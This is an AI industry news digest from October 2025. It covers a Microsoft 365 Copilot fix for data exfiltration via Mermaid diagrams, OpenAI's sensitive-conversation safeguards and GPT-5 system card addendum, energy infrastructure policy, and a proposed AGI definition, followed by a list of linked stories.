Oct 27, 2025

Safety fixes, transparency pressure, and a push to define AGI

The gist

Today’s AI news clustered around trust, safety, and the growing infrastructure behind large models. Microsoft addressed a data leak pathway in Microsoft 365 Copilot that used Mermaid diagram rendering, an example of how harmless-looking content can become an exfiltration vector when mixed with AI assistants. OpenAI highlighted safety upgrades for sensitive conversations in ChatGPT and published a GPT-5 system card addendum focused on mental health and jailbreak resistance, while also urging large-scale investment in energy and compute to meet future demand. On the research front, a widely discussed arXiv paper proposes a concrete definition and scoring framework for AGI rooted in human cognitive science. Rounding out the day, TechCrunch reports OpenAI is building a generative music tool, and several thoughtful posts probed model architecture choices and the power networks that shape the industry. Expect security hardening in enterprise AI, more rigorous measurement of general intelligence, and louder calls for transparency from the companies steering the field.

Releases and updates

Microsoft 365 Copilot received a security fix after a researcher showed that Mermaid diagrams could be crafted to trigger arbitrary data exfiltration inside Copilot enhanced workflows. For enterprises piloting AI in productivity suites, this is a reminder to audit not only prompts and plugins, but also renderers and embedded visualization tools that can be abused. Microsoft characterizes the issue as fixed, and the episode will likely feed updated content sanitization and policy rules for Copilot deployments.

OpenAI detailed new safeguards for sensitive conversations in ChatGPT, built with input from more than 170 mental health professionals. The company reports large reductions in unsafe responses, along with improved recognition of distress and clearer guidance to real-world resources. An addendum to the GPT-5 system card focuses specifically on sensitive use cases, including new benchmarks tied to emotional reliance, mental health, and jailbreak resistance. Together these updates point to a product strategy that invests in both capability and care pathways, especially where users may be at risk.

Policy moved in parallel. In a submission framed as seizing the AI opportunity, OpenAI argues that the United States will need significant expansion of energy, data center capacity, and workforce training to sustain progress, a signal that the model roadmap is now inseparable from grid planning, permitting, and supply chains. The message to policymakers and utilities is straightforward, scaling AI requires reliable power, upstream infrastructure, and talent pipelines.

New creative tooling appears to be on deck. TechCrunch reports that OpenAI is developing a generative music product, a move that would extend the company’s media creation lineup and intensify licensing and attribution debates. If launched, expect immediate enterprise interest in legal safe modes for commercial use, plus integrations with video and advertising workflows.

Why this matters for leaders

Security is not just about model outputs, it is increasingly about the full stack of content that models process. The Mermaid diagram case shows that format parsers and renderers inside office suites and copilots can become attack surfaces. CIOs should review how files, charts, and visualizations are sanitized before LLMs or AI-enhanced viewers touch them, bake these checks into data loss prevention playbooks, and ensure vendors can attest to fixes and monitoring.

Safety improvements for sensitive conversations are moving from nice to have to required, especially in regulated or duty-of-care environments. If your organization exposes users to AI assistants in healthcare, education, or customer support, map OpenAI’s updates to your own escalation policies and human-in-the-loop procedures. Look for measurable reductions in unsafe responses, not just policy language.

Infrastructure is the limiting reagent. Strategic plans that assume continuous model upgrades must also assume higher power density, interconnect, and specialized labor. Procurement teams should begin tying model adoption milestones to concrete energy and capacity commitments, including location decisions that balance latency, cost, and grid constraints.

The governance narrative is sharpening. A Wall Street Journal opinion calls for Microsoft to be more open about its dealings with OpenAI. Regardless of where you sit, the takeaway is clear, regulators and investors are pressing for clarity on control, safety assurances, and data governance. Expect disclosure expectations to rise, including model system cards, security incident reporting, and third party audits.

Finally, measurement shapes markets. An AGI definition underpinned by human cognitive theory, with a ten domain evaluation approach, will encourage buyers to look beyond single benchmarks. If the field coalesces around richer scorecards that expose jagged capabilities, procurement will shift from one number rankings to profile based fit, better aligning models with specific workflows.

Field note to bookmark

A new arXiv paper proposes a practical definition of AGI, equating it to the cognitive versatility and proficiency of a well educated adult, then operationalizes that definition using the Cattell Horn Carroll model from psychometrics. The authors adapt established human test batteries across ten cognitive domains, report that today’s systems show uneven strengths and weaknesses, and argue that long term memory remains a core gap. Whether or not you agree with the scoring, the approach offers a shared language for product teams, policymakers, and researchers, and it will influence how roadmaps, safety cases, and procurement criteria are framed in the months ahead. Complement this with a thoughtful blog post asking whether LLMs should treat text as images, a provocative angle that hints at architectural unification across modalities, and with an interactive map of the AI network that helps contextualize who is connected to whom as technical and policy debates accelerate.

Creating an all-weather driver (waymo.com) hn

Claude for Excel (claude.com) hn

Addendum to GPT-5 System Card: Sensitive conversations (openai.com) This system card details GPT-5’s improvements in handling sensitive conversations, including new benchmarks for emotional reliance, mental health, and jailbreak resistance. openai

Strengthening ChatGPT’s responses in sensitive conversations (openai.com) OpenAI collaborated with 170+ mental health experts to improve ChatGPT’s ability to recognize distress, respond empathetically, and guide users toward real-world support—reducing unsafe responses by u… openai

Seizing the AI opportunity (openai.com) Meeting the demands of the Intelligence Age will require strategic investment in energy and infrastructure. OpenAI’s submission to the White House details how expanding capacity and workforce readines… openai

A definition of AGI (arxiv.org) hn

Microsoft needs to open up more about its OpenAI dealings (wsj.com) hn

Microsoft 365 Copilot – Arbitrary Data Exfiltration via Mermaid Diagrams (adamlogue.com) hn

A law and tax firm redefines efficiency with ChatGPT Business (openai.com) Learn how Steuerrecht.com uses ChatGPT Business to streamline legal workflows, automate tax research, and scale client service—helping law firms boost productivity and stay competitive. openai

Show HN: Git Auto Commit (GAC) – LLM-powered Git commit command line tool (github.com) hn

Show HN: Erdos – open-source, AI data science IDE (lotas.ai) hn

The new calculus of AI-based coding (blog.joemag.dev) hn